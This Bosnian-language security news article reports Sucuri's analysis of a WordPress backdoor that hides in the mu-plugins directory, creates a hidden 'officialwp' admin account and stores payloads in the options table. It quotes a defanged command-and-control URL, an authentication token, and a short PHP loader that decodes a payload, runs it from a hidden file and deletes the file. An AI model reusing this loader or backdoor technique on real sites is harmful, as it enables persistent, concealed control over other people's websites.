Otkrivena je sofisticirana kampanja malicioznog softvera za WordPress koja djeluje kroz rijetko praćeni direktorij mu-plugins, omogućavajući napadačima stalan pristup kompromitovanim web stranicama, izbjegavajući tradicionalne sigurnosne mjere.
Maliciozni kod, identifikovan kao wp-index.php, iskorištava WordPressovu funkcionalnost “obaveznih dodataka” kako bi održao kontinuirani rad bez mogućnosti deaktivacije putem administratorske ploče.
Backdoor koriste napredne tehnike obfuskacije , koristeći ROT13 kodiranje kako bi prikrili svoju komunikaciju komandovanja i kontrole.
Nakon izvršavanja, maliciozni softver preuzima udaljene korisne podatke sa skrivene URL adrese i pohranjuje ih direktno u WordPress bazu podataka pod opcijskim ključem „_hdra_core“, efektivno zaobilazeći sigurnosne skeniranja zasnovane na datotečnom sistemu koja se prvenstveno fokusiraju na modifikacije datoteka.
Analitičari Sucurija identificirali su ovu posebno podmuklu prijetnju tokom rutinskih istraga malicioznog softvera, ističući njenu izuzetnu sposobnost održavanja postojanosti kroz više vektora infekcije.
Istraživači su primijetili da maliciozni softver kreira skrivenog administratorskog korisnika pod nazivom “officialwp”, a istovremeno skriva svoje prisustvo od korisničkog interfejsa WordPressa putem pažljivo izrađenih funkcija filtriranja.
Mehanizam infekcije pokazuje izuzetnu sofisticiranost u metodologiji izvršenja.
Primarni skript za učitavanje preuzima base64-enkodirane korisne podatke sa udaljenog servera na hxxps://1870y4rr4y3d1k757673q[.]xyz/cron.php, koji kada se dekodiraju otkrivaju sveobuhvatan okvir malicioznog softvera .
.webp)
Ovaj okvir uključuje prikriveni upravitelj datoteka prikriven kao “pricing-table-3.php” unutar aktivnog direktorija teme, zaštićen prilagođenim tokenom za autentifikaciju “fsociety_OwnzU_4Evr_1337H4x!” koji se prenosi putem HTTP zaglavlja.
Strategija perzistencije usmjerena na bazu podataka
Najproblematičnija karakteristika malicioznog softvera leži u njegovom pristupu održavanju trajnosti usmjerenom na bazu podataka.
Umjesto da se oslanja isključivo na infekcije zasnovane na datotekama koje se mogu otkriti praćenjem integriteta, backdoor pohranjuje svoj korisni teret unutar WordPressove tabele opcija. Ovaj pohranjeni korisni teret se koristi prije nego što se odmah očisti privremene datoteke, ostavljajući minimalne forenzičke dokaze.
$cronCore = wp_upload_dir()['basedir'] . '/.sess-' . md5(time()) . '.php';
file_put_contents($cronCore, base64_decode($payload));
include($cronCore);
@unlink($cronCore);Ovaj pristup osigurava da maliciozni softver preživi standardne procedure čišćenja, a istovremeno napadačima pruža mogućnosti daljinskog izvršavanja koda i potpunu administrativnu kontrolu nad kompromitovanim WordPress instalacijama.
Izvor: CyberSecurityNews
